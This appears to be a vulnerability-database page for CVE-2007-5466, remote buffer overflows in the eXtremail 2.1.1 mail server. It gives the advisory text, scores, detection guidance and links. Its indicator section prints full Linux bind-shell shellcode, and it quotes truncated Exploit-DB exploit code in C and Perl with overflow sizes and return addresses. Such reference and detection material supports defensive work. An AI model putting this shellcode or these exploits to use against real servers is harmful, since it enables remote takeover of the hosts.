CVE-2007-5466
published 2007-10-15CVE-2007-5466: Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to (1) have an unknown impact by sending multiple long strings to the IMAP port…
PriorityP258critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
19.89%
97.1th percentile
Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to (1) have an unknown impact by sending multiple long strings to the IMAP port (143/tcp); (2) execute arbitrary code via a long string in an IMAP AUTHENTICATE PLAIN action, involving the ifParseAuthPlain function; (3) execute arbitrary code via a long LOGIN command to the admin interface port (4501/tcp); or (4) execute arbitrary code via a long string in an IMAP AUTHENTICATE LOGIN (aka CRAM-MD5 authentication) action, involving the ifProcImapAuth1 function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extremail | extremail | <= 2.1.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
bytes↗
\x8b\x44\x24\x08\x40\xff\xe0
- →Detect exploitation of the IMAP AUTHENTICATE PLAIN overflow by monitoring for oversized base64-encoded payloads sent immediately after the '1 AUTHENTICATE PLAIN' command on port 143/tcp, targeting the ifParseAuthPlain function. ↗
- →Detect exploitation of the IMAP AUTHENTICATE LOGIN (CRAM-MD5) overflow by monitoring for oversized responses to the authentication challenge on port 143/tcp, targeting the ifProcImapAuth1 function. ↗
- →Detect exploitation of the admin interface overflow by monitoring for oversized LOGIN commands on port 4501/tcp; the exploit sends 'LOGIN <large_buf> digit-labs.org\n'. ↗
- →After successful exploitation, the bind shellcode opens a listening shell on port 4444/tcp; monitor for unexpected inbound connections to port 4444 on eXtremail server hosts. ↗
- →The Linux bind shellcode contains the byte sequence \x66\x68\x11\x5c which encodes port 4444 (0x115c) in the socket bind call; scan network captures for this shellcode signature on IMAP or admin port traffic. ↗
- →The heap overflow PoC sends a payload starting with a null byte followed by 0x2710-1 NOP bytes, then repeats 0x2710-byte NOP blocks in a loop; detect abnormally large IMAP session data bursts on port 143/tcp. ↗
- ·The exploit targets two specific eXtremail versions with hardcoded return addresses; the fp value 0x08216357 is for version 2.1.1 and 0x08216377 is for version 2.1.0 (tar.gz builds). These addresses will not be valid for other builds or distributions. ↗
- ·The AUTHENTICATE PLAIN exploit uses a fixed buffer size of 256 bytes for the overflow payload; the admin LOGIN exploit uses a buffer size of 788 bytes. Detection thresholds should account for these sizes. ↗
- ·The return pointer for the admin LOGIN exploit (extremail-v4.c) is derived from 'objdump -D smtpd | grep "ff e4"', meaning the fp values are specific to the unmodified tar.gz distribution binaries of eXtremail 2.1.1 and 2.1.0. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - Remote Heap Overflow (PoC)
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
---
#!/usr/bin/perl
#
# extremail-v8.pl
#
# Copyright (c) 2007 by
#
# eXtremail * Connected\n");
sleep(16);
print("-> * Sending payload\n");
$buf = "\x00".($NOP x (0x2710-1));
send(SOCKET, $buf, 0);
sleep($send_delay);
$buf = $NOP x 0x2710;
while ($loop--) {
print("-> * Sending payload ".$loop."\n");
send(SOCKET, $buf, 0);
sleep($send_delay);
}
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyna
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
No writeups or analysis indexed.
http://secunia.com/advisories/27220http://www.digit-labs.org/files/exploits/extremail-v4.chttp://www.digit-labs.org/files/exploits/extremail-v5.chttp://www.digit-labs.org/files/exploits/extremail-v6.chttp://www.digit-labs.org/files/exploits/extremail-v8.plhttp://www.securityfocus.com/archive/1/482293http://www.securityfocus.com/bid/26074https://exchange.xforce.ibmcloud.com/vulnerabilities/37209https://www.exploit-db.com/exploits/4533https://www.exploit-db.com/exploits/4534https://www.exploit-db.com/exploits/4535http://secunia.com/advisories/27220http://www.digit-labs.org/files/exploits/extremail-v4.chttp://www.digit-labs.org/files/exploits/extremail-v5.chttp://www.digit-labs.org/files/exploits/extremail-v6.chttp://www.digit-labs.org/files/exploits/extremail-v8.plhttp://www.securityfocus.com/archive/1/482293http://www.securityfocus.com/bid/26074https://exchange.xforce.ibmcloud.com/vulnerabilities/37209https://www.exploit-db.com/exploits/4533https://www.exploit-db.com/exploits/4534https://www.exploit-db.com/exploits/4535
2007-10-15
Published